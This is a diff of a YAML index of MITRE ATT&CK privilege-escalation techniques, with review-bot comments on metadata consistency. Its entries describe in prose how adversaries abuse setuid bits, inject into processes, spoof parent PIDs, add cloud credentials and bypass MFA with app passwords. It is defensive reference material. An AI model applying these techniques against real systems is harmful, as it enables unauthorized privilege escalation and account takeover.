name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -18596,11 +18916,10 @@ privilege-escalation:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -18641,11 +18960,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
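Review bot: after the `- spec_version: '2.1'` removal the T1548 block ends with `atomic_tests: []` and no `identifier:` line, unlike T1134.002 just below and most other entries; the same gap appears for T1548.005, T1055.013, T1574.005 and T1098.005. The missing line is unchanged context, so it is pre-existing rather than introduced here, but since this change touches exactly that spot it is a good moment to make the generator emit `identifier: T1548` consistently, or to open a follow-up for it.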
@@ -18701,12 +19019,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18763,7 +19080,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1547.004:
@@ -18833,7 +19149,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -18943,7 +19258,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -18997,7 +19311,7 @@ privilege-escalation:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -19030,13 +19344,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -19098,10 +19410,9 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -19159,7 +19470,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -19201,7 +19511,7 @@ privilege-escalation:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -19260,8 +19570,6 @@ privilege-escalation:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.005:
technique:
@@ -19291,7 +19599,7 @@ privilege-escalation:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -19326,12 +19634,10 @@ privilege-escalation:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19408,7 +19714,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1055.004:
@@ -19447,7 +19752,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -19496,8 +19801,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1546.009:
@@ -19529,7 +19832,7 @@ privilege-escalation:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19577,13 +19880,11 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19596,16 +19897,16 @@ privilege-escalation:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -19617,16 +19918,16 @@ privilege-escalation:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
@@ -19681,7 +19982,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.002:
technique:
@@ -19704,7 +20004,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19748,8 +20048,6 @@ privilege-escalation:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1547.015:
@@ -19826,7 +20124,7 @@ privilege-escalation:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -19854,8 +20152,6 @@ privilege-escalation:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1134.001:
@@ -19914,23 +20210,22 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -19940,11 +20235,15 @@ privilege-escalation:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -19955,12 +20254,19 @@ privilege-escalation:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -19969,6 +20275,7 @@ privilege-escalation:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19977,13 +20284,16 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
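Review bot: Check that the two new data sources `'Active Directory: Active Directory Object Creation'` and `'Active Directory: Active Directory Object Modification'` are intended for this object: the platform list in the same hunk becomes `IaaS`, `SaaS`, `Identity Provider` (with `Azure AD` removed and no `Windows`), so an Active Directory data source reads as a mismatch unless it is meant to cover Entra ID under the new `Identity Provider` platform. If that is the intent, the detection text should say so; otherwise the existing `'User Account: User Account Modification'` source already covers the app-password case.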
@@ -20009,10 +20319,18 @@ privilege-escalation:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
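Review bot: `Lacework AI Resource Hijacking 2024` and `Permiso Scattered Spider 2023` are added to `external_references`, but no `(Citation: ...)` for either appears in any added description text in this diff (the new paragraph cites only Mandiant and Microsoft). Confirm both are referenced somewhere in the object's description, otherwise they are dangling references. Style point: the Lacework entry starts with the title rather than an author ("Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs."), unlike the surrounding entries; if the source has no named author, "Lacework Labs. (2024, June 6). Detecting ..." would match the existing convention.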
@@ -20021,10 +20339,20 @@ privilege-escalation:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -20041,9 +20369,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests:
- name: Azure AD Application Hijacking - Service Principal
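Review bot: `- spec_version: '2.1'` is dropped here and from every other technique object in this diff with no replacement. If anything downstream treats these `technique` blocks as STIX 2.1 objects, `spec_version` is a required common property on SDOs, so this should be a deliberate generator change rather than a side effect of the re-export; a line in the commit message saying so would help. The other two removals (`x_mitre_attack_spec_version`, `x_mitre_modified_by_ref`) are just the tail end of the key relocation done earlier in this object.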
@@ -20249,7 +20574,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -20338,7 +20662,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1134.004:
@@ -20396,7 +20719,7 @@ privilege-escalation:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
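Review bot: The `modified` timestamp goes backwards here, from `2022-05-24T14:00:00.188Z` to `2022-05-03T02:15:42.360Z`, and the same regression appears for VDSO Hijacking, Emond, Services File Permissions Weakness and KernelCallbackTable later in this diff. The old values all share the `14:00:00.188Z` suffix, which looks like a batch stamp rather than the upstream value, so the new timestamps are probably the correct ones; still, anyone diffing on `modified` to detect updated techniques will see these objects as older than before, so call this out in the commit message or PR description.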
@@ -20421,12 +20744,11 @@ privilege-escalation:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -20452,7 +20774,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -20466,7 +20787,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -20493,8 +20813,8 @@ privilege-escalation:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -20505,7 +20825,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
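Review bot: Key placement is inconsistent between objects: for T1098.001 earlier in this diff `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` were moved up next to `kill_chain_phases`, while here for T1546.001 they are removed from that position and re-added at the bottom after `object_marking_refs`. Both are valid YAML, but a deterministic key order in the exporter would stop these fields from wandering between exports. The `2.1.0` to `3.2.0` attack-spec bump with `x_mitre_version` left at `'1.0'` is correct, since the only content change in this object is the refreshed `Microsoft File Handlers` URL and retrieval date.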
T1055.014:
@@ -20576,7 +20897,7 @@ privilege-escalation:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20603,7 +20924,6 @@ privilege-escalation:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.014:
technique:
@@ -20643,7 +20963,7 @@ privilege-escalation:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20663,12 +20983,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20722,11 +21041,10 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20813,9 +21131,9 @@ privilege-escalation:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
